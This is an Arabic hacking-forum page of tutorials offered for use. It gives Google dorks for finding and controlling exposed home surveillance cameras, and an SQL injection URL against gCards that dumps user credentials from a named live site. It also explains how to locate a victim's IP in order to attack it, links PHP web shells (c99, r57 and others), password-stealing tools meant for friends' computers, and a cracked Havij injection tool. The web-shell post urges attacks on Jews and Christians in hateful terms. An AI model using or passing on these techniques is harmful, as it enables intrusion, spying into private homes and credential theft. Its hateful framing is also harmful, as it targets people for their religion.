اخترق وتحكم في كاميرات المراقبه

ثغرة ممتعة جدا تمكنك من مشاهدة كاميرات

المراقبة التى توضع فى المنازل ويمكنك ايضا التحكم بالكاميرا .

واسال الله ان تفيد الجميع . .

شرح الثغرة :
اذهب الى جوجل. . <http://www.google.com> واكتب فى محرك البحث

هذه ثغرات المشاهده. .

inurl:"MultiCameraFrame?Mode="

inurl:"ViewerFrame?Mode="

inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode="
inurl:"axis-cgi/mjpg"
وهذه ثغرات المشاهده بالتحكم
ادخل الي محرك بحث جوجل واكتب
LiveApplet
هتظهر لك مواقع بنفس الاسم كلها هكذا

LiveApplet
LiveApplet
LiveApplet
LiveApplet
LiveApplet
ادخل على اى موقع فيهم وانتظر التحميل وستجد امامك الكاميرا

وشوف المفأجاة . .
سبب الثغرة هى ان بعض شركات المراقبة تقوم بوضع كاميرات موصولة

بالانترنت وهذة الشركات لاتلتفت للجانب الامنى لذلك يمكن الوصول اليها عبر

محركات البحث او شركات تقديم خدمة المراقبة . .

وهذة الكاميرات تحتاج ( جافا ) حتى تعمل

Read More

ثغرة sql سهلة للجميع

 ثغرة sql سهلة للجميع

السـلام عليكم ورحمـة الله وبركاته

كيف حالكم شباب عساكم بخير ان شاءالله

عندي درس عن لاختراق باستخدام ثغرات SQL

السكربت الي عندنا يحتوي على ثغرة اسمة gCards v1.46

طريقة البحث عن السكربت اذهب الي google

واكتب الدورك :
Powered by gCards v1.46


المواقع كثيـره مصاابـه زي مآأنتم شاايفين الحين انا بطبق على موقع عندي
ستخرج لك مواقع كثيرة مصابة

أخترنا منها هذا الموقع :
http://www.feve.de


اما طريقة الاستغلال جاهزة مجرد تربطة بالرابط
هذا هو رابط الاستغلال:.


getnewsitem.php?newsid=1+union+select+1,2,concat(u ser****,0x3a3a,userpass),4,5+from+gc_cardusers


نضيفة بعد السكربت

لاحظ معي

الحين نروح فك الباسورد المشفر .. تابع معي مبروك انت كذا طلعت الادمن والباسورد تابع معي

http://md5.rednoize.com

 

 

Read More

نصائح ضرورية جداً لمبتدئي الهكر.

السلام عليكم و رحمة الله و بركاته
اهلين بأعضاء احلا منتدى
اليوم عندي نصائح ضرورية جداً لمبتدئي الهكر

1_تعلم دائماً أن لا تثق بهكر:فيمكن أن يقول لك أتريد برنامج تضع الايميل يوصلك الباسورد...بشكل طبيعي سوف تنفعل و توافق ثم يقوم بإرسال برنامج لا يعمل و يكون فد دمج به فيروس أو سيرفر(باتش)...ما هو السيرفر(الباتش)؟
السيرفر(الباتش):هو ملف امتداده(exe.)عندما يتم فتحه يستطيع من قام بتكوينه الدخول إلى الكومبيوتر الذي فُتح منه السيرفر(الباتش)و سحب جميع الباسوردات الموجودة فيه.

2_احمي جهازك بمضاد الفيروسات(Anti Virus)لأن من قام بتكوين السيرفر(الباتش) إن لم يكن محترف فلن يشفر السيرفر(الباتش)....ما هوالتشفير؟
التشفير:هو منع بمضادات الفيروسات(Anti Virus)من رؤية السيرفر(الباتش) أو الفيروسات كفيروس لأن بشكل طبيعي يعتبر السيرفر(الباتش) فيروس فالتشفير يمنع بمضادات الفيروسات(Anti Virus)من رؤية السيرفر(الباتش) كفيروس.

3_إذا أعطاك أحدٌ لا تعرفه موقع و قال لك سجل دخولك لتربح...فلا تسجل دخولكفقد تكون صفحة مزورة.ما هي الصفحة المزورة؟
الصفحة المزورة:هي صفحة ك لما يكتب فيها يرسل لمصممها(كلمة المرور+الايميل).

4_إذا أعطاك أحدٌ لا تعرفه موقع فلا تدخل اليه فقد يكون ملغم إيضاً(مدموج به سيرفر).

5_إذا وصلتك رسالة لا تعرف مرسلها فلا تفتحها فقد تكون ملغمة إيضاً(مدموجة سيرفر).

6_عند تنزيل أي شيء من النت يفضل فحصه بإحد الروابط التي تفحص بجميع مضادات الفيروسات(Anti Virus).

Read More

شرح استخراج Ip المستهدف بُ اسهل طريقه ُ..

صبآح الخير آن كآن صبآحآ ومسسآء الخير آن كآن مسسآءآ .ُ.
كيف الححُآل حبآيبي آن شاء الله تمام ُ. .

آليوم بأذن الله سيتم شرح ُ
طريقه احتمآل تكون معروفه عند بُعض آلآششخآصص ُ..
ولاكن الطريقه جميله جدآ للُأستهدآف الخخآرجيٌ
لبعض الملغمين او المستهدفين ُ. .
طبعآ الطريقه هي ُ .
1 - لازم يكون عندك اآسم نو اي بي المراد استهدآفهه ُ. .
2 - تكون عندك خخبره بُ الاستهدآف الخآرججي ُ. .
I-----------------------I
الطريقه تتكلم عنُ
( انك تفتح الدوس وتضع نو آي بي الملغم وسيظهر لكُ Ip صآحب الههوست ُ.. )
طبعآ الطريقه تتكلم عن ارسال هجومات للنو آي بي + اظهار اي بي صآحب الههوست ُ..ُ
I-----------------------I
بُسم الله نبدآ ششرح ُ
اول شى نفتح الدوس ٌُ. .


ثم يفتح لنا آلدوس ُ..
نقوم بكتآبه هذا الامر ُ. .
( Ping -t ******.no-ip.biz )
طبعآ مكان ( **** ) نقوم بكتآبه الهوست المراد
الهجوم آليه أو المراد معرفه الاي بي تبع الشخص للذي يستخدم هذا الهوست .ُ.
طبعا واذا عرفت الاي بي تبعه تقدر تحدد موقعه او استهدافه او ارسال هجومات الي جهازه بُ البآك وغيرهآ ُ. .
تآبع :~
يجب وضع النو اي بي هكذآ .ُ.

بعدها نقوم بٌُ الظغط على زر ( EnTeR )
وسيظهر لنآ Ip صآححب الهوست + الهجوم ععُ الههوست ُ. .

مثُل مُ انتوآ شآيفين الآي بي اللي بُ اللون الاحممر ُ..
هو آي بي صآحب آللهوست ُ..~

صوره رقم 1
صوره رقم 2

صوره رقم 3

آنتهى ُ.
I-----------------------------------------------I
تم بحمدالله شرح الدرس ُ..
وان شاء الله كان بسيط الدرس ُ. .
ومو ممل :$
وان شاء الله نراكم لآحقآ ُ..
ارجوا الدععآء لٌي بُ التوفيق ..
الله يوفق الجميع ان شاء لله ُ..
فمان الله ُ..

 

Read More

جميع أنواع سكريبت php الحديثه للتحميل + ومميزاتها

---

السلام عليكم ورحمة الله وبركاته

حياكم الله أحبتي في الله

إليكم أخواني في الله إسكربتات الشل الحديثة

مع شرح مختصر عن أهم مميزات كلاُ منها


وأرجــــو ألا تستخدم إلا فيما يرضي الله ورسوله


وذلك ضد المغضوب عليهم ( اليهود الملاعيين أحفاد القردة والخنازير)

أو الضالين ( النصاري )

أو المواقع المخالفه للشريعه

=====================

بسم الله الرحمن الرحيم نبدأ



====================================

c99.phpl

الوصف ..

شل روسي جميل جدا ومن خصائصه الاتصال بقاعده البيانات
والتنقل بين المجلدات والكثير من الخصائص اكتشفها بنفسك ..




====================================

r57.php

الوصف ..

شل روسي جميل جدا ومن خصائصه التنقل بين المجلدات بكل سهوله
واظهار صلاحياتك علي السيرفر ومعلومات عن السيرفر من اصدار كيرنل .. إلخ وايضا رفع ملف الي الموقع عن طريق upload
بكل سهوله والاتصال بقاعده البيانات وايضا يوجد فيه باكدور والكثير ..



====================================

Nstview

الوصف ..

شل حديث وتقريبا نفس الشل الروسي r57 من رفع ملف وتعديل .. إلخ
يعني فرق بسيط بينهم والكثير من الخصائص اكتشفها بنفسك ..




====================================

Phpspy

الوصف ..

شل جميل ومن خصائصه انشاء مجلد جديد
والاتصال بقاعده البيانات يعني نفس الشل الروسي
وجميع هالشلات الفرق بينهم بسيط واكتشف الخاصيات بنفسك




جميع السكربتات بالمرفقات
====================================



وبالتوفي

الملفات المرفقة

	ch99.zip‏
	nstview.zip‏
	phpspy.zip‏
	r57.zip‏

Read More

كل ادوات استخراج كلمات السر هنــــا

بسم الله الرحمن الرحيم

الاوات هي كتالي
استخراج باس المتصفحات
opera
firefox
google chrome
internet explo

اداة استخراج الار دي بي
اداة استخراج الفي ان سي vnc
استخراج باس الحسابات التالية

MSN PASSWORD
facebook
yahoo
twitter
IMPassword
Mailpv
MSN PASSWORD
NET PASS<< كل المواقع المخزنة على كل المتصفحات
wirelesskey

والكتير من الادوات
طريقة التشغيل بسيطة بس نصب الادوات وراح تفهم طريقة تشغيلها
ملاحظة الادوات تستخرج الباسوردات اللي في الجهاز
يعني لو في جهاز احد اصدقائك وا كذا ....

لتحميل الادوات من حبيب الملايين ميديافاير
http://www.mediafire.com/?c3al8n8rxfn2elx

في امان الله

Read More

Havij Pro V1.17

#~السلام عليكم ورحمة الله وبركاته~#



برنامج الهافيج الغني عن التعريف : Havij

لاستغلال ثغرات الـ SQL بانواعها

اليوم معنا النسخة الاخيره مع الكراك

طبعا فيه نسخ مكركة ولاكن ليست كامله

لاتوجد فيها خاصية تخطي المود سيكورتي وغيرها

وجبت النسخة الكاملة والكامل وجه الله مع الكراك والمفتاح

طبعا الكراك او الباتش عند الانتي فايرس يعتبر فايرس

وتم فحص البرنامج والكراك من التلغيم والحمدلله نضيف

طيب نجي لطريقة التشغيل :

اول شي نثبت البرنامج وبعد التثبيت اذهب للمسار :

كود PHP:

C:\Program Files\ITSecTeam\Havij Pro  

وضع الكراك بالمجلد اعلاه ^

اللي اسمه : 

كود PHP:

Loader.e x e  

الحين نفتح الكراك ~ Loader.e x e

تابع الصوره :



بعد تشغيل الكراك :




بخانة الـ Nam e تضع اي اسم

وبخانة الـ File تضع المفتاح : HavijKey.lic

ومن ثم تضغط على : Register

كذا تم التشغيل بنجاح :



كذا خلصنا انتهينى الحين عند تشغيل البرنامج يتم تشغيل الكراك

ووضع اي اسم وملف المفتاح ومن ثم تسجيل وخلاص مبروك عليك



نجي لتحميل البرنامج + الكراك + المفتاح :

http://www.mediafire.com/download/70...+Pro+V1.17.zip

تحياتي

Read More